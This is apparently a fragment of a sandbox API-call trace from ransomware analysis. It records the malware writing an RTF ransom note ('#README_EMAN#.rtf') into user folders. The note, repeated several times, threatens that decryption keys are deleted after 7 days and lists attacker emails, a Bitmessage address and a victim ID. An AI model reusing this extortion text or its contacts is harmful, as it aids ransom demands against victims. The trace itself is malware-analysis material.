lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.112] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.113] CloseHandle (hObject=0x2ec) returned 1 [0291.113] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0291.113] GetLastError () returned 0x2 [0291.113] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 